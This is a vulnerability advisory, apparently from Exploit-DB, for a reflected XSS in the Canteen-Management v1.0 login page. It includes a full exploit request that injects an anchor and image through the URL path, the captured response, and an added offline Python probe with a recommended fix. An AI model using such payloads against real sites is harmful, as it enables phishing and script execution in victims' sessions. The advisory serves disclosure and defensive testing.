Canteen-Management v1.0 – XSS-Reflected

  • Author: nu11secur1ty
    Date: 2023-03-27
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/51062/

## Exploit Title: Canteen-Management v1.0 - XSS-Reflected
## Exploit Author: nu11secur1ty
## Date: 10.04.2022
## Vendor: Free PHP Projects & Ideas with Source Codes for Students | mayurik <https://www.mayurik.com/>
## Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/Docs
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management

## Description:
The extra path segment appended after `login.php` (the request is `/youthappam/login.php/<injected>`) is copied, without HTML encoding, into the value of the login form's `action` attribute, which is enclosed in double quotation marks. A path containing `">` therefore terminates the attribute and the `<form>` tag, and everything that follows is rendered as markup inside the application's origin. The login page is reachable without authentication, and the response carries no Content-Security-Policy header, so an attacker can send a victim a crafted link to the application and have arbitrary attacker-controlled HTML rendered when the victim opens it. The proof below injects an anchor to an external site wrapping an image; a `<script>` element at the same position would execute in the same way.
    
[+]Payload REQUEST:

```http
GET /youthappam/login.php/lu555%22%3E%3Ca%20href=%22https://pornhub.com/%22%20target=%22_blank%22%20rel=%22noopener%20nofollow%20ugc%22%3E%20%3Cimg%20src=%22https://raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/IMG_0068.gif?token=GHSAT0AAAAAABXWGSKOH7MBFLEKF4M6Y3YCYYKADTQ&rs=1%22%20style=%22border:1px%20solid%20black;max-width:100%;%22%20alt=%22Photo%20of%20Byron%20Bay,%20one%20of%20Australia%27s%20best%20beaches!%22%3E%20%3C/a%3Emv2me HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="106", "Chromium";v="106"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
```
    
[+]Payload RESPONSE:

```http
HTTP/1.1 200 OK
Date: Tue, 04 Oct 2022 09:44:55 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
X-Powered-By: PHP/8.1.6
Set-Cookie: PHPSESSID=m1teao9b0j86ep94m6v7ek7fe6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 6140
Connection: close
Content-Type: text/html; charset=UTF-8

<link rel="stylesheet" href="assets/css/popup_style.css">
 <style>
.footer1 {
position: fixed;
bottom: 0;
width: 100%;
color: #5c4ac7;
text-align: center;
}

</style>
 <!DOCTYPE html>
<html lang="en">

<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">

<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=0, minimal-ui">
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="description" content="">
<meta name="keywords" content="">
<meta name="author" content="">

<link rel="icon" type="image/png" sizes="16x16" href="assets/uploadImage/Logo/favicon.png">

 <style type="text/css">
@media print {
#printbtn {
display :none;
}
}
</style>
<title>Youthappam Canteen Management System - by Mayuri K. Freelancer</title>

<link href="assets/css/lib/chartist/chartist.min.css" rel="stylesheet">
<link href="assets/css/lib/owl.carousel.min.css" rel="stylesheet" />
<link href="assets/css/lib/owl.theme.default.min.css" rel="stylesheet" />

<link href="assets/css/lib/bootstrap/bootstrap.min.css" rel="stylesheet">

<link href="assets/css/helper.css" rel="stylesheet">
<link href="assets/css/style.css" rel="stylesheet">
 <link rel="stylesheet" href="assets/css/lib/html5-editor/bootstrap-wysihtml5.css" />
 <link href="assets/css/lib/calendar2/semantic.ui.min.css" rel="stylesheet">
<link href="assets/css/lib/calendar2/pignose.calendar.min.css" rel="stylesheet">
 <link href="assets/css/lib/sweetalert/sweetalert.css" rel="stylesheet">
 <link href="assets/css/lib/datepicker/bootstrap-datepicker3.min.css" rel="stylesheet">

<script type="text/javascript" src="https://www.gstatic.com/charts/loader.js"></script>
<script type="text/javascript">
google.charts.load("current", {packages:["corechart"]});
google.charts.setOnLoadCallback(drawChart);
function drawChart() {
var data = google.visualization.arrayToDataTable([
['Food', 'Average sale per Day'],
['Masala dosa', 11],
['Chicken 65 ',2],
['Karapu Boondi',2],
['Bellam Gavvalu', 2],
['Gummadikaya Vadiyalu',7]
]);

var options = {
title: 'Food Average Sale per Day',
pieHole: 0.4,
};

var chart = new google.visualization.PieChart(document.getElementById('donutchart'));
chart.draw(data, options);
}
</script>
</head>

<body class="fix-header fix-sidebar">

<div id="page"></div>
<div id="loading"></div>

<div id="main-wrapper">
<div class="unix-login">

<div class="container-fluid" style="background-image: url('assets/myimages/background.jpg'); background-color: #ffffff;background-size:cover">
<div class="row">
<div class="col-lg-4 ml-auto">
<div class="login-content">
<div class="login-form">
<center><img src="assets/uploadImage/Logo/logo.png" style="width: 100%;"></center><br>
<form action="/youthappam/login.php/lu555"><a href="https:/pornhub.com/" target="_blank" rel="noopener nofollow ugc"> <img src="https:/raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/IMG_0068.gif" method="post" id="loginForm">
<div class="form-group">

<input type="text" name="username" id="username" class="form-control" placeholder="Username" required="">

</div>
<div class="form-group">

<input type="password" id="password" name="password" class="form-control" placeholder="Password" required="">
</div>

<button type="submit" name="login" class="f-w-600 btn btn-primary btn-flat m-b-30 m-t-30">Sign in</button>

<!-- <div class="forgot-phone text-right f-right">
<a href="#" class="text-right f-w-600"> Forgot Password?</a>
</div> -->

<div class="forgot-phone text-left f-left">
<a href = "mailto:mayuri.infospace@gmail.com?subject = Project Development Requirement&body = I saw your projects. I want to develop a project" class="text-right f-w-600"> Click here to contact me</a>
</div>
</form>
</div>
</div>
</div>
</div>
</div>
</div>
</div>

<script src="assets/js/lib/jquery/jquery.min.js"></script>

<script src="assets/js/lib/bootstrap/js/popper.min.js"></script>
<script src="assets/js/lib/bootstrap/js/bootstrap.min.js"></script>

<script src="assets/js/jquery.slimscroll.js"></script>

<script src="assets/js/sidebarmenu.js"></script>

<script src="assets/js/lib/sticky-kit-master/dist/sticky-kit.min.js"></script>

<script src="assets/js/custom.min.js"></script>
<script>

function onReady(callback) {
var intervalID = window.setInterval(checkReady, 1000);
function checkReady() {
if (document.getElementsByTagName('body')[0] !== undefined) {
window.clearInterval(intervalID);
callback.call(this);
}
}
}

function show(id, value) {
document.getElementById(id).style.display = value ? 'block' : 'none';
}

onReady(function () {
show('page', true);
show('loading', false);
});
</script>
</body>

</html>
```
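The reflection shown in the response (`<form action="/youthappam/login.php/lu555"><a href=...`) can be verified without a browser or any JavaScript: send a canary that closes the quoted `action` attribute and opens a custom element, then parse the response the way a browser would and check whether that element became a real tag. The following Python is an added example, not code from this advisory or from the Canteen-Management project. `render_login_vulnerable` and `render_login_fixed` are constructed stand-ins for the login template (the project's PHP source is not shown on this page): the vulnerable one assumes the page writes the decoded request path, as `$_SERVER['PHP_SELF']` exposes it, straight into the attribute; the fixed one applies attribute-context encoding equivalent to `htmlspecialchars($path, ENT_QUOTES, 'UTF-8')`. `probe` stands in for the HTTP round trip so the check runs offline.

```python
"""Offline check for path reflection into a double-quoted HTML attribute.

Added example: the render_* functions are constructed stand-ins for the
Canteen-Management login template, not the project's own code.
"""
import html
from html.parser import HTMLParser
from urllib.parse import quote, unquote

LOGIN_PATH = "/youthappam/login.php"


def build_probe_url_path(canary: str) -> str:
    """Return the request path that tests the reflection.

    Everything after login.php is what the page echoes. The probe closes the
    double-quoted attribute, closes the tag, then opens a harmless custom
    element that carries the canary so a parser can find it again.
    """
    injected = f'{canary}"><zz-{canary}>'
    return f"{LOGIN_PATH}/{quote(injected, safe='')}"


def render_login_vulnerable(request_path: str) -> str:
    """Constructed template mirroring the observed behaviour: the decoded
    request path (assumed to come from PHP_SELF) lands in the attribute raw."""
    return (
        f'<form action="{request_path}" method="post" id="loginForm">'
        '<input type="text" name="username"></form>'
    )


def render_login_fixed(request_path: str) -> str:
    """Same template with attribute-context encoding (quotes included),
    the equivalent of htmlspecialchars(..., ENT_QUOTES) in PHP."""
    return (
        f'<form action="{html.escape(request_path, quote=True)}" '
        'method="post" id="loginForm">'
        '<input type="text" name="username"></form>'
    )


class _TagCollector(HTMLParser):
    """Record every start tag the parser sees, in document order."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []

    def handle_starttag(self, tag, attrs) -> None:
        self.tags.append(tag)


def broke_out_of_attribute(response_body: str, canary: str) -> bool:
    """True when the parsed document contains the injected element, i.e. the
    quote we sent terminated the attribute and our tag became live markup.
    An encoded reflection keeps the whole probe inside the attribute value."""
    parser = _TagCollector()
    parser.feed(response_body)
    return f"zz-{canary}" in parser.tags


def probe(render, canary: str = "c4n4ry") -> bool:
    """Push the probe path through a renderer and report whether it is
    reflected as markup. `render` stands in for the HTTP request/response."""
    path = build_probe_url_path(canary)
    decoded = unquote(path)  # the web server hands the script the decoded path
    return broke_out_of_attribute(render(decoded), canary)


if __name__ == "__main__":
    print("vulnerable template:", probe(render_login_vulnerable))  # True
    print("fixed template:     ", probe(render_login_fixed))       # False
```

Against a live instance, replace `render` with an HTTP GET of `build_probe_url_path(canary)` and feed the response body to `broke_out_of_attribute`; the path is tested from an unauthenticated session, which matches the login page here. The encoding in `render_login_fixed` stops the breakout, but the more robust fix is to stop echoing the request path at all (a literal `action="login.php"` or an empty `action`), since `PHP_SELF` is attacker-influenced by design.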
    
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/mayuri_k/2022/Canteen-Management)

## Proof and Exploit:
[href](https://streamable.com/emg0zo)

-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>